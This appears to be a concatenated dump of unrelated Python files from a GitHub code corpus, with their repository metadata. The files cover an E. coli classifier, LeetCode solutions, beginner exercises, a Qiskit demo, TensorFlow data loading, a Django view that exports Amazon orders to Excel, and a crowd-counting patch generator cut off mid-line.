l.append(interaction)\n\n temp.append(l)\n if flag:\n dataset= np.vstack((dataset, np.array(temp)))\n\n dataset= np.delete(dataset, 0, axis= 0)\n print(\"Dataset shape:\\t\", dataset.shape)\n\n X= dataset[:, :-1]\n y= dataset[:, -1]\n\n print(\"X shape:\\t\", X.shape, \"\\ny shape:\\t\", y.shape)\n return X, y\n\n\n\n\n\necoli_subsystem_mets= []\nwith open(subsys_mets_file, 'r') as file:\n reader= csv.reader(file, delimiter= ',')\n for row in reader:\n ecoli_subsystem_mets.append(row[0])\n\necoli_subsystem_genes= []\nwith open(subsys_genes_file, 'r') as file:\n reader= csv.reader(file, delimiter= ',')\n for row in reader:\n ecoli_subsystem_genes.append(row[0])\n\n\necoli_exceptions= [(m, p) for m in ecoli_subsystem_mets for p in ecoli_subsystem_genes]\n\n\necoli_met_filename= './ecoli/met_sps_t80_replaced.csv'\necoli_gene_filename= './ecoli/gene_in_rxns.csv'\necoli_all_met_names, ecoli_all_met_features = read_file(ecoli_met_filename)\necoli_all_met_features= make_unique_without_zeros(ecoli_all_met_features, 2)\necoli_all_met_names, ecoli_all_met_features= delete_redundant_entries(ecoli_all_met_names, ecoli_all_met_features)\necoli_all_gene_names, ecoli_all_gene_features =read_file(ecoli_gene_filename)\necoli_all_gene_features= make_unique_without_zeros(ecoli_all_gene_features, 0)\n\necoli_subsystem_met_names, ecoli_subsystem_met_features= read_specified_file(ecoli_met_filename, ecoli_subsystem_mets, 2)\necoli_subsystem_gene_names, ecoli_susbystem_gene_features= read_specified_file(ecoli_gene_filename, ecoli_subsystem_genes, 0)\n\nprint(\"Ecoli Test:\")\n\necoli_X_test, ecoli_y_test= make_dataset_exact(ecoli_subsystem_met_names, ecoli_subsystem_met_features,\n ecoli_subsystem_gene_names, ecoli_susbystem_gene_features,\n 'stitch_ecoli', 400, ecoli_exceptions)\n\nprint(\"Ecoli_train:\")\necoli_X_train, ecoli_y_train= make_dataset_exception(ecoli_all_met_names, ecoli_all_met_features,\n ecoli_all_gene_names, ecoli_all_gene_features,\n 'stitch_ecoli', 400, ecoli_exceptions)\n\n\nrus= RandomUnderSampler()\necoli_X_res, ecoli_y_res= rus.fit_resample(ecoli_X_train, ecoli_y_train)\nprint('Original Set:', Counter(ecoli_y_train))\nprint('Resampled Set:', Counter(ecoli_y_res))\nclf= RandomForestClassifier(n_estimators= 100)\nclf.fit(ecoli_X_res, ecoli_y_res)\necoli_y_pred= clf.predict(ecoli_X_test)\nprint(\"Ecoli accuracy on sussystem as a test set:\", accuracy_score(ecoli_y_test, ecoli_y_pred))\n","repo_name":"fayazsoleymani/SARTRE","sub_path":"subsys_shared/subsys.py","file_name":"subsys.py","file_ext":"py","file_size_in_byte":9496,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"17129291702","text":"#coding=utf-8\nclass Solution:\n def reverse(self, x):\n \"\"\"\n :type x: int\n :rtype: int\n \"\"\"\n print(-int(2**31))\n #if x >= 2e31 or x < -2e31 or x == 0:\n # 注意,2e31和2**31的区别\n if x >= 2**31 or x <= -2**31 or x == 0:\n return 0\n str_x = str(x)\n # [i:j:s]的意思是,从i到j,步长为s\n # 如果s<0,则i,j都为负数,从倒数开始算\n # 例如s[-1:-len(s)-1:-1]就代表反转\n if x < 0:\n result = int('-'+str(int(str_x[-1:-len(str_x):-1])))\n # 千万别忘了,反转的记过也要判断啊!!!!!!\n if result >= 2 ** 31 or result <= -2 ** 31 or result == 0:\n return 0\n return result\n else:\n result = int(str(int(str_x[-1:-len(str_x)-1:-1])))\n if result >= 2 ** 31 or result <= -2 ** 31 or result == 0:\n return 0\n return result\n\nsolution = Solution()\nprint(solution.reverse(4236469))","repo_name":"PotentialPie/leetcode-python","sub_path":"algorithm/leetcode-7.py","file_name":"leetcode-7.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"14991637410","text":"# 1 task\ndef check_str(text_source: str) -> str:\n index_upper = 0\n index_lower = 0\n\n for i in text_source:\n # checking lower\n if i.lower() == i and i.upper() != i:\n index_lower += 1\n # checking upper\n if i.lower() != i and i.upper() == i:\n index_upper += 1\n final_string = str(index_upper) + ' upper case, ' + str(index_lower) + ' lower case'\n return final_string\n\n# test 1\n# source = 'The quick Brown Fox'\n# print(check_str(source))\n\n\n\n# 2 task\ndef is_prime(int_source: int) -> bool:\n index = 0\n\n # calculations\n for i in range(int_source):\n if i != 0:\n if int_source % i == 0:\n index += 1\n if int_source % int_source == 0:\n index += 1\n\n # result\n if index == 2:\n result = True\n else:\n result = False\n return result\n\n# test 2\n# source = 777\n# print(is_prime(source))\n\n\n# 3 task\ndef get_ranges(list_source: list) -> str:\n path = []\n index = 0\n\n # calculations\n for i in range(len(list_source)):\n if i != len(list_source)-1 and list_source[i+1]-list_source[i] == 1:\n index += 1\n\n elif index == 0:\n path.append(str(list_source[i]))\n\n elif index != 0:\n path.append(f'{list_source[i - index]}-{list_source[i]}')\n index = 0\n\n result = f'{\",\".join(path)}'\n return result\n\n#test 3\n# source = [0, 1, 2, 3, 4, 7, 8, 10]\n# print(get_ranges(source))","repo_name":"MikitaTsiarentsyeu/Md-PT1-59-22","sub_path":"Tasks/Kirutsin/task5/task5.py","file_name":"task5.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72024633746","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\nfrom qiskit import *\n\n\n# In[3]:\n\n\ncircuit = QuantumCircuit(2,2)\n\n\n# In[4]:\n\n\ncircuit.draw()\n\n\n# In[5]:\n\n\ncircuit.h(0)\n\n\n# In[6]:\n\n\ncircuit.draw()\n\n\n# In[7]:\n\n\ncircuit.cx(0, 1)\ncircuit.draw()\n\n\n# In[8]:\n\n\ncircuit.measure([0, 1], [0, 1]) #mesure qubit 0 and 1, and associate to classical bits 0 and 1\n\n\n# In[9]:\n\n\ncircuit.draw()\n\n\n# In[10]:\n\n\nsimulator = Aer.get_backend(\"qasm_simulator\")\n\n\n# In[12]:\n\n\nexecute(circuit, backend=simulator).result()\n\n\n# In[13]:\n\n\nfrom qiskit.visualization import plot_histogram\n\n\n# In[14]:\n\n\nresult = execute(circuit, backend=simulator).result()\n\n\n# In[15]:\n\n\nplot_histogram(result.get_counts(circuit))\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"RicardoParizotto/qiskit_learn","sub_path":"hello-quantum/ibm_example.py","file_name":"ibm_example.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35737584527","text":"import tensorflow as tf\nimport numpy as np\n\n\ndef get_syn_data(num_data=2000):\n sample = np.random.uniform(low=0.25, high=1, size=num_data)\n x = sample * np.cos(4 * np.pi * sample)\n y = sample * np.sin(4 * np.pi * sample)\n\n return np.vstack((x, y)).T\n\n\ndef get_data(dataset_name, data_shape, buffer_size, batch_size):\n if dataset_name == 'mnist':\n (train_images, train_labels), (_, _) = tf.keras.datasets.mnist.load_data()\n elif dataset_name == 'cifar10':\n (train_images, train_labels), (_, _) = tf.keras.datasets.cifar10.load_data()\n elif dataset_name == 'cifar100':\n (train_images, train_labels), (_, _) = tf.keras.datasets.cifar100.load_data()\n elif dataset_name == 'fashion_mnist':\n (train_images, train_labels), (_, _) = tf.keras.datasets.fashion_mnist.load_data()\n elif dataset_name == 'Synthetic2d':\n train_images = get_syn_data()\n else:\n raise ValueError('No datasets supported')\n\n train_images = train_images.reshape(train_images.shape[0], *data_shape).astype('float32')\n if dataset_name != 'Synthetic2d':\n train_images = (train_images - 127.5) / 127.5\n\n BUFFER_SIZE = buffer_size\n BATCH_SIZE = batch_size\n\n # Batch and shuffle the data\n train_dataset = tf.data.Dataset.from_tensor_slices(train_images).shuffle(BUFFER_SIZE).batch(BATCH_SIZE)\n\n if dataset_name != 'Synthetic2d':\n ind = np.arange(0, train_images.shape[0])\n ind = np.random.choice(ind, size=10000, replace=False)\n test_data = train_images[ind, :]\n test_data = test_data.reshape(10000, -1)\n else:\n test_data = get_syn_data(10000)\n test_data = test_data.astype('float32')\n test_data = test_data.reshape(10000, -1)\n\n\n return train_dataset, test_data\n\n# print(get_syn_data(10))\n","repo_name":"yihang-gao/WGAN_generalization","sub_path":"LWGAN_code/utils/loaddata.py","file_name":"loaddata.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5671107665","text":"#\n# @lc app=leetcode id=1930 lang=python\n#\n# [1930] Unique Length-3 Palindromic Subsequences\n#\n\n# @lc code=start\nfrom collections import Counter, defaultdict\nclass Solution(object):\n def countPalindromicSubsequence(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n res = set()\n left = set()\n right = Counter(s)\n\n for i in range(len(s)):\n right[s[i]] -= 1\n if right[s[i]] == 0:\n right.pop(s[i])\n \n for c in \"abcdefghijklmnopqrstuvwxyz\":\n if c in left and c in right:\n res.add((s[i], c))\n left.add(s[i])\n \n return len(res)\n# @lc code=end\ns = \"tlpjzdmtwderpkpmgoyrcxttiheassztncqvnfjeyxxp\"\nprint(Solution().countPalindromicSubsequence(s))","repo_name":"felivalencia3/Leetcode","sub_path":"1930.unique-length-3-palindromic-subsequences.py","file_name":"1930.unique-length-3-palindromic-subsequences.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6401706141","text":"import os\nimport datetime\nimport pandas as pd\nfrom copy import copy\nfrom pytz import timezone\nfrom my_modules import mysqlconn\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponse, StreamingHttpResponse\nfrom django.template import loader\nfrom django.urls import reverse\n\nfrom . import models\nfrom .config import templates as templates_cnf\n\n\n#################################################\n# global variable part\n\n# get fields from models\ndef _get_fields():\n fields = []\n for i in models.Orders._meta.fields:\n fields.append('orders.' + str(i).split('.')[-1])\n fields.remove('orders.id')\n for i in models.OrderItems._meta.fields:\n fields.append('orderitems.' + str(i).split('.')[-1])\n fields.remove('orderitems.id')\n for i in models.Inventory._meta.fields:\n fields.append('inventory.' + str(i).split('.')[-1])\n fields.remove('inventory.id')\n return fields\n\n\nfields = _get_fields()\ncontext = {'fields': fields,\n 'selected_field': '',\n 'conditions': '',\n}\n\n\n#################################################\n# custom exception part\nclass QueryException(Exception):\n \"\"\"It raise an exception when it comes an error using the selected_field and conditions to query\"\"\"\n pass\n\n\nclass CreateSheetError(Exception):\n \"\"\"It raise an exception when it comes an error using the data and fields to create a sheet\"\"\"\n\n def __init__(self, expression=None, message=None):\n self.expression = expression\n self.message = message\n\n def __str__(self):\n if self.expression:\n return self.expression, self.message\n else:\n return self.message\n\n\n#################################################\n# view part\ndef index(request):\n template = loader.get_template('sheet_download/index.html')\n return HttpResponse(template.render({}, request))\n\n\ndef templates(request):\n template = loader.get_template('sheet_download/templates.html')\n return HttpResponse(template.render(context, request))\n\n\ndef orders(request):\n template = loader.get_template('sheet_download/orders.html')\n return HttpResponse(template.render(context, request))\n\n\ndef download(request):\n conditions = {}\n from_tz = request.POST['from_tz']\n to_tz = request.POST['to_tz']\n conditions['purchase_start'] = _form_date_str(request.POST.getlist('purchase_start'))\n conditions['purchase_end'] = _form_date_str(request.POST.getlist('purchase_end'))\n conditions['paid_start'] = _form_date_str(request.POST.getlist('paid_start'))\n conditions['paid_end'] = _form_date_str(request.POST.getlist('paid_end'))\n fields = request.POST.getlist('fields')\n _context = copy(context)\n\n selected_field = \", \".join(fields)\n _conditions = []\n if conditions['purchase_start'] != \"0000-00-00 00:00:00\":\n conditions['purchase_start'] = tz_transfer(conditions['purchase_start'], from_tz, to_tz)\n _conditions.append(\"orders.PurchaseDate>='%s'\" % conditions['purchase_start'])\n if conditions['purchase_end'] != \"0000-00-00 00:00:00\":\n conditions['purchase_end'] = tz_transfer(conditions['purchase_end'], from_tz, to_tz)\n _conditions.append(\"orders.PurchaseDate<'%s'\" % conditions['purchase_end'])\n if conditions['paid_start'] != \"0000-00-00 00:00:00\":\n conditions['paid_start'] = tz_transfer(conditions['paid_start'], from_tz, to_tz)\n _conditions.append(\"orders.PaidDate>='%s'\" % conditions['paid_start'])\n if conditions['paid_end'] != \"0000-00-00 00:00:00\":\n conditions['paid_end'] = tz_transfer(conditions['paid_end'], from_tz, to_tz)\n _conditions.append(\"orders.PaidDate<'%s'\" % conditions['paid_end'])\n _conditions = \" and \".join(_conditions)\n\n try:\n assert selected_field\n data = _query(selected_field, _conditions)\n file_path = _create_sheet(data, selected_field, 'UTC', from_tz)\n except AssertionError:\n _context['error_message'] = \"Must Select Some Fields\"\n except QueryException:\n _context['error_message'] = \"QueryError: The Date is wrong\"\n except CreateSheetError:\n _context['error_message'] = \"CreateSheetError: Please try again after a moment\"\n\n if _context.get('error_message'):\n return render(request,\n 'sheet_download/orders.html',\n context=_context\n )\n else:\n response = StreamingHttpResponse(_file_iterator(file_path))\n response['Content-Type'] = 'application/octet-stream'\n response['Content-Disposition'] = 'attachment;filename=\"{0}\"'.format(file_path[-20:])\n return response\n\n\ndef custom_download(request):\n conditions = request.POST['conditions'].strip()\n selected_field = request.POST['selected_field'].strip()\n _context = copy(context)\n _context['selected_field'] = selected_field\n _context['conditions'] = conditions\n\n try:\n assert selected_field\n data = _query(selected_field, conditions)\n file_path = _create_sheet(data, selected_field, 'UTC', from_tz)\n except AssertionError:\n _context['error_message_custom'] = \"Select Fields can't be None\"\n except QueryException:\n _context['error_message_custom'] = \"QueryError: Select Fields or Conditions is wrong\"\n except CreateSheetError:\n _context['error_message_custom'] = \"CreateSheetError: Please try again after a moment\"\n\n if _context.get('error_message'):\n return render(request,\n 'sheet_download/orders.html',\n context=_context\n )\n else:\n response = StreamingHttpResponse(_file_iterator(file_path))\n response['Content-Type'] = 'application/octet-stream'\n response['Content-Disposition'] = 'attachment;filename=\"{0}\"'.format(file_path[-20:])\n return response\n\n\ndef templates_download(request):\n conditions = {}\n from_tz = request.POST['from_tz']\n to_tz = request.POST['to_tz']\n template_id = request.POST['template_id']\n conditions['purchase_start'] = _form_date_str(request.POST.getlist('purchase_start'))\n conditions['purchase_end'] = _form_date_str(request.POST.getlist('purchase_end'))\n conditions['paid_start'] = _form_date_str(request.POST.getlist('paid_start'))\n conditions['paid_end'] = _form_date_str(request.POST.getlist('paid_end'))\n _context = copy(context)\n\n selected_field = [i[0] for i in templates_cnf[template_id]['selected_field']]\n column_name = [i[1] for i in templates_cnf[template_id]['selected_field']]\n selected_field = ','.join(selected_field)\n _conditions = []\n if conditions['purchase_start'] != \"0000-00-00 00:00:00\":\n conditions['purchase_start'] = tz_transfer(conditions['purchase_start'], from_tz, to_tz)\n _conditions.append(\"orders.PurchaseDate>='%s'\" % conditions['purchase_start'])\n if conditions['purchase_end'] != \"0000-00-00 00:00:00\":\n conditions['purchase_end'] = tz_transfer(conditions['purchase_end'], from_tz, to_tz)\n _conditions.append(\"orders.PurchaseDate<'%s'\" % conditions['purchase_end'])\n if conditions['paid_start'] != \"0000-00-00 00:00:00\":\n conditions['paid_start'] = tz_transfer(conditions['paid_start'], from_tz, to_tz)\n _conditions.append(\"orders.PaidDate>='%s'\" % conditions['paid_start'])\n if conditions['paid_end'] != \"0000-00-00 00:00:00\":\n conditions['paid_end'] = tz_transfer(conditions['paid_end'], from_tz, to_tz)\n _conditions.append(\"orders.PaidDate<'%s'\" % conditions['paid_end'])\n _conditions = \" and \".join(_conditions)\n\n try:\n assert selected_field\n data = _query(selected_field, _conditions)\n file_path = _create_sheet(data, selected_field, 'UTC', from_tz, col_repl=column_name)\n except AssertionError:\n _context['error_message'] = \"Must Select Some Fields\"\n except QueryException:\n _context['error_message'] = \"QueryError\"\n except CreateSheetError:\n _context['error_message'] = \"CreateSheetError: Please try again after a moment\"\n\n if _context.get('error_message'):\n return render(request,\n 'sheet_download/templates.html',\n context=_context\n )\n else:\n response = StreamingHttpResponse(_file_iterator(file_path))\n response['Content-Type'] = 'application/octet-stream'\n response['Content-Disposition'] = 'attachment;filename=\"{0}\"'.format(file_path[-20:])\n return response\n\n\ndef inventory_download(request):\n conditions = {}\n from_tz = request.POST['from_tz']\n to_tz = request.POST['to_tz']\n template_id = request.POST['template_id']\n marketplace_id = request.POST['marketplace']\n _context = copy(context)\n\n selected_field = [i[0] for i in templates_cnf[template_id]['selected_field']]\n column_name = [i[1] for i in templates_cnf[template_id]['selected_field']]\n selected_field = ','.join(selected_field)\n sql = \"select %s from inventory left join price on inventory.SellerSKU=price.SellerSKU and inventory.Seller=price.Seller and inventory.MarketplaceId=price.MarketplaceId where inventory.MarketplaceId='%s';\" % (selected_field, marketplace_id)\n\n try:\n data = _query(selected_field, conditions, sql=sql)\n file_path = _create_sheet(data, selected_field, 'UTC', from_tz, col_repl=column_name)\n except Exception:\n _context['error_message_2'] = \"CreateSheetError: Please try again after a moment\"\n\n if _context.get('error_message_2'):\n return render(request,\n 'sheet_download/templates.html',\n context=_context\n )\n else:\n response = StreamingHttpResponse(_file_iterator(file_path))\n response['Content-Type'] = 'application/octet-stream'\n response['Content-Disposition'] = 'attachment;filename=\"{0}\"'.format(file_path[-20:])\n return response\n\n\n#################################################\n# auxiliary function part\n\n# form datetime string for PurchaseDate and PaidDate\n# the PurchaseDate or PaidDate got from web request is a list like ['', '00:00:00'] or ['2018-01-01', '00:00:00']\ndef _form_date_str(datetime_list):\n if datetime_list[0]:\n return ' '.join(datetime_list)\n else:\n return ' '.join(['0000-00-00', datetime_list[1]])\n\n# query in orders, orderitems and inventory tables according to the selected_field and conditions\ndef _query(selected_field, conditions, sql=None):\n if not sql:\n sql = \"select \" + selected_field + \" from orders \" \\\n \"left join orderitems on orders.AmazonOrderId=orderitems.AmazonOrderId \" \\\n \"left join inventory on orderitems.SellerSKU=inventory.SellerSKU \" \\\n \"and orders.Seller=inventory.Seller\"\n if conditions:\n sql = sql + \" where \" + conditions\n # order the data by orders.LastUpdateDate to ease the later handling\n sql = sql + \" order by orders.AmazonOrderId, orders.LastUpdateDate;\"\n\n try:\n conn = mysqlconn.mysqlconn(db='DB_NAME')\n cur = conn.cursor()\n cur.execute(sql)\n data = cur.fetchall()\n except:\n raise QueryException\n else:\n result = []\n # delete the duplicate data\n for i in data:\n if i not in result:\n result.append(i)\n return result\n finally:\n conn.close()\n\n\n# create a sheet according to data and fields\ndef _create_sheet(data, fields, from_tz, to_tz, col_repl=[]):\n if isinstance(fields, str):\n fields = fields.replace(' ', '').split(',')\n elif isinstance(fields, list) or isinstance(fields, tuple):\n pass\n else:\n raise CreateSheetError(expression=fields, message=\"Fields Error\")\n try:\n df = pd.DataFrame(data, columns=fields)\n\n # delete the duplicate data according to orders.AmazonOrderId and remain the latest record\n if 'orders.AmazonOrderId' in fields:\n df = df.drop_duplicates(['orders.AmazonOrderId', 'orderitems.SellerSKU'], keep='last').reset_index(drop=True)\n # tranfer timezone\n df = df_tz_transfer(df, from_tz, to_tz)\n # replace the column name with col_repl\n if col_repl:\n df.columns = col_repl\n\n created_time = datetime.datetime.strftime(datetime.datetime.now(),\"%Y%m%d_%H%M%S\")\n file_path = os.path.join(os.path.dirname(__file__), 'temp_files/', created_time+'.xlsx')\n writer = pd.ExcelWriter(file_path)\n df.to_excel(writer, sheet_name='Sheet1', index=False)\n writer.save()\n return file_path\n except:\n raise CreateSheetError(message=\"Creating Error\")\n finally:\n writer.close()\n\n\n# tranfer timezone of DataFrame columns of Timestamp type to a certain timezone\ndef df_tz_transfer(df, from_tz, to_tz):\n if df.shape[0]:\n # Check type of each column. If the time is pandas._libs.tslib.Timestamp, then change its timezone.\n for column in df.columns:\n # get the index of item in that column that is not None \n for i in df.index:\n if df[column][i] == df[column][i]:\n break\n if type(df[column][i]) is pd._libs.tslib.Timestamp:\n tmp = list(df[column])\n df[column] = [tz_transfer(str(i), from_tz, to_tz) for i in tmp]\n return df\n else:\n return df\n\n\n# open a file in stream (using the generator method)\ndef _file_iterator(file_name, chunk_size=512):\n with open(file_name, 'rb') as f:\n while True:\n c = f.read(chunk_size)\n if c:\n yield c\n else:\n break\n\n\n# tranfer a time string in 'from_tz' timezone to a time string in 'to_tz' timezone\ndef tz_transfer(time_string, from_tz, to_tz):\n # return '' if the time_string is None\n if time_string in ('', 'NaT'):\n return ''\n\n from_tz = timezone(from_tz)\n to_tz = timezone(to_tz)\n fmt = '%Y-%m-%d %H:%M:%S'\n\n from_time = from_tz.localize(datetime.datetime.strptime(time_string, fmt))\n to_time = from_time.astimezone(to_tz)\n return to_time.strftime(fmt)\n","repo_name":"suiweifanchen/A-Simple-Django-Project","sub_path":"amazon/sheet_download/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42453578549","text":"class Solution:\n def evalRPN(self, tokens: List[str]) -> int:\n stack = []\n for token in tokens:\n if token.isnumeric() or token[1:].isnumeric():\n stack.append(int(token))\n else:\n operand1 = stack[-2]\n operand2 = stack.pop(-1)\n\n if token == \"/\":\n token = \"//\"\n actual = eval(f\"{operand1} {token} {operand2}\")\n candidate = eval(f\"{abs(operand1)} {token} {abs(operand2)}\")\n if abs(actual) != abs(candidate):\n stack[-1] = -1 * candidate\n else:\n stack[-1] = actual\n else:\n stack[-1] = eval(f\"{operand1} {token} {operand2}\")\n return stack[-1]","repo_name":"versenyi98/programming-contests","sub_path":"LeetCode/0150. Evaluate Reverse Polish Notation/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"1119288643","text":"import scipy.io as sio\nimport os\nimport numpy as np\nimport PIL.Image as pli\nimport math\nimport multiprocessing as mlt \nimport matplotlib.pyplot as plt \nimport matplotlib.image as mpimg\n \n\nST_DATA = \"Shanghai Tech Dataset\"\nUCF_DATA = \"UCF CC 50 Dataset\"\n\nST_DATA_CONFIG = {\n 'dataset': ST_DATA,\n 'img_format': 'IMG_{}.jpg',\n 'gt_format': 'GT_IMG_{}.mat',\n 'img_ext': 'jpg'\n}\n\nUCF_DATA_CONFIG = {\n 'dataset': UCF_DATA,\n 'img_format': '{}.jpg',\n 'gt_format': '{}_ann.mat',\n 'img_ext': 'jpg'\n}\n\nUCSD_DATA_CONFIG = {\n 'img_format': 'vidf1_33_00{}_f{}.png',\n 'gt_format': 'vidf1_33_00{}_frame_full.mat',\n 'numfiles': 200,\n 'img_ext': 'jpg'\n}\n\nclass DimensionException(Exception):\n pass\n\nclass BaseCreatePatches:\n def __init__(self, **kwargs):\n self.img_fold = self.get_full_path(kwargs.pop('img_fold'))\n self.gt_fold = self.get_full_path(kwargs.pop('gt_fold'))\n self.final_img_fold = self.get_full_path(kwargs.pop('final_img_fold'), True)\n self.final_gt_fold = self.get_full_path(kwargs.pop('final_gt_fold'), True)\n self.img_prefix = 'IMG_'\n self.img_format = kwargs.pop('img_format')\n self.gt_format = kwargs.pop('gt_format')\n self.numfiles = self.get_numfiles(kwargs)\n self.img_ext = kwargs.pop('img_ext')\n\n def get_full_path(self, rel_path, makedir=False):\n directory = os.path.join(\n os.path.dirname(\n os.path.abspath(\n __file__\n )\n ),\n rel_path\n )\n if makedir:\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n return directory \n\n def get_numfiles(self, kwargs):\n if \"numfiles\" in kwargs:\n return kwargs.pop('numfiles')\n else:\n return len([f for f in os.listdir(self.img_fold) if f.endswith('.jpg') and os.path.isfile(os.path.join(self.img_fold, f))]) \n\n def create_dotmaps(self, gt, img_h, img_w):\n d_map = np.zeros((int(img_h), int(img_w)))\n\n gt = gt[gt[:, 0] < img_w, :]\n gt = gt[gt[:, 1] < img_h, :]\n\n for i in range(gt.shape[0]):\n x = int(max(1, math.floor(gt[i, 0]))) - 1\n y = int(max(1, math.floor(gt[i, 1]))) - 1\n d_map[y, x] = 1.0\n return d_map\n\n def check_dim(self, img):\n if img.ndim != 3:\n if img.ndim == 2:\n img = np.stack((img,)*3, axis=2)\n else:\n raise DimensionException(\"Image has incorrect dimensions. {}\".format(img.shape))\n return img\n\n def save_gt(self, gt, i, count):\n name = '{}{}_{}.mat'.format(self.img_prefix, i + 1, count)\n sio.savemat(os.path.join(self.final_gt_fold, name), {'final_gt': gt})\n\n def save_image(self, img, i, count):\n name = '{}{}_{}.{}'.format(self.img_prefix, i + 1, count, self.img_ext)\n img = np.uint8(img)\n img = pli.fromarray(img).save(os.path.join(self.final_img_fold, name))\n\n def plot_image_tiles(self, index):\n fig = plt.figure()\n count = 1\n for i in range(3):\n for j in range(3):\n a=fig.add_subplot(3,3,count)\n a.set_xticks([])\n a.set_yticks([])\n b = mpimg.imread(\n os.path.join(self.final_img_fold, 'IMG_{}_{}.{}'.format(index, count, self.img_ext)))\n imgplot = plt.imshow(b)\n count += 1\n plt.subplots_adjust(left=None, bottom=.18, right=None, top=None, wspace=.01, hspace=.001)\n plt.show()\n\n def plot_dot_tiles(self, index):\n fig = plt.figure()\n count = 1\n for i in range(3):\n for j in range(3):\n a=fig.add_subplot(3,3,count)\n a.set_xticks([])\n a.set_yticks([])\n d = sio.loadmat(\n os.path.join(self.final_gt_fold, 'IMG_{}_{}.mat'.format(index, count)))\n dt = d['final_gt']\n imgplot = plt.imshow(dt, cmap='gray')\n count += 1\n plt.subplots_adjust(left=None, bottom=.18, right=None, top=None, wspace=.01, hspace=.001)\n plt.show() \n\n\nclass CreatePatches(BaseCreatePatches):\n\n def __init__(self, **kwargs):\n super(CreatePatches, self).__init__(**kwargs)\n self.dataset = kwargs.pop('dataset')\n\n\n def get_image(self, i):\n img_filename = self.img_format.format(i + 1)\n img_path = os.path.join(self.img_fold, img_filename)\n img = pli.open(img_path)\n img = np.asarray(img, dtype=np.uint8)\n return img\n\n def _get_st_data_ground_truth(self, i):\n gt_filename = self.gt_format.format(i + 1)\n gt_path = os.path.join(self.gt_fold, gt_filename)\n gt = sio.loadmat(gt_path)\n image_info = gt['image_info']\n value = image_info[0,0]\n assert len(value['location']) == 1\n for i in value['location']:\n assert len(i) == 1\n for j in i:\n return j \n\n def _get_ucf_data_ground_truth(self, i):\n gt_filename = self.gt_format.format(i + 1)\n gt_path = os.path.join(self.gt_fold, gt_filename)\n gt = sio.loadmat(gt_path)\n ann_points = gt['annPoints']\n return ann_points\n\n def get_ground_truth(self, i):\n if self.dataset == ST_DATA:\n return self._get_st_data_ground_truth(i) \n\n elif self.dataset == UCF_DATA:\n return self._get_ucf_data_ground_truth(i)\n\n def _create_test_set(self, i):\n #print(i + 1)\n img = self.get_image(i)\n # moved this out of loop because 3rd dim indexing doesn't work in numpy unless already that shape\n img = self.check_dim(img)\n gt = self.get_ground_truth(i)\n print (gt.shape)\n\n d_map_h = math.floor(math.floor(float(img.shape[0]) / 2.0) / 2.0)\n d_map_w = math.floor(math.floor(float(img.shape[1]) / 2.0) / 2.0)\n\n d_map = self.create_dotmaps(gt / 4.0, d_map_h, d_map_w)\n\n p_h = int(math.floor(float(img.shape[0]) / 3.0))\n p_w = int(math.floor(float(img.shape[1]) / 3.0))\n d_map_ph = int(math.floor(math.floor(p_h / 2.0) / 2.0))\n d_map_pw = int(math.floor(math.floor(p_w / 2.0) / 2.0))\n \n py = 0\n py2 = 0\n count = 1\n\n for j in range(3):\n px = 0\n px2 = 0\n for k in range(3):\n final_image = img[py:py + p_h, px: px + p_w, :]\n final_gt = d_map[py2: py2 + d_map_ph, px2: px2 + d_map_pw] \n px = px + p_w \n px2 = px2 + d_map_pw\n self.save_image(final_image, i, count)\n self.save_gt(final_gt, i, count)\n count += 1\n py = py + p_h\n py2 = py2 + d_map_ph \n\n def create_test_set(self):\n p = mlt.Pool(mlt.cpu_count())\n p.map(self._create_test_set, range(self.numfiles))\n\n #for i in range(self.numfiles):\n #self._create_test_set(i)\n\n\nclass CreatePatchesUCSD(BaseCreatePatches):\n def __init__(self, **kwargs):\n super(CreatePatchesUCSD, self).__init__(**kwargs)\n\n\n def get_image(self, i, j):\n img_filename = self.img_format.format(i, f'{(j + 1):03}')\n #print (img_filename)\n img_path = os.path.join(self.sub_img_fold, img_filename)\n img = pli.open(img_path)\n img = np.asarray(img, dtype=np.uint8)\n return img\n\n def get_ground_truth(self, j):\n gt = self.gts[j]\n for x in gt['loc']:\n for y in x:\n return np.delete(y, 2, 1)\n\n def _create_test_set(self, i, j):\n print (self.overall_count)\n #print(j + 1)\n img = self.get_image(i, j) # ten image folders, each with 200 images\n # moved this out of loop because 3rd dim indexing doesn't work in numpy unless already that shape\n img = self.check_dim(img)\n gt = self.get_ground_truth(j) # ten frame .mat files, each with 200 locations\n #print (gt.shape)\n\n d_map_h = math.floor(math.floor(float(img.shape[0]) / 2.0) / 2.0)\n d_map_w = math.floor(math.floor(float(img.shape[1]) / 2.0) / 2.0)\n\n d_map = self.create_dotmaps(gt / 4.0, d_map_h, d_map_w)\n #print(np.count_nonzero(d_map))\n\n p_h = int(math.floor(float(img.shape[0]) / 3.0))\n p_w = int(math.floor(float(img.shape[1]) / 3.0))\n d_map_ph = int(math.floor(math.floor(p_h / 2.0) / 2.0))\n d_map_pw = int(math.floor(math.floor(p_w / 2.0) / 2.0))\n \n py = 0\n py2 = 0\n count = 1\n\n for _ in range(3):\n px = 0\n px2 = 0\n for __ in range(3):\n final_image = img[py:py + p_h, px: px + p_w, :]\n final_gt = d_map[py2: py2 + d_map_ph, px2: px2 + 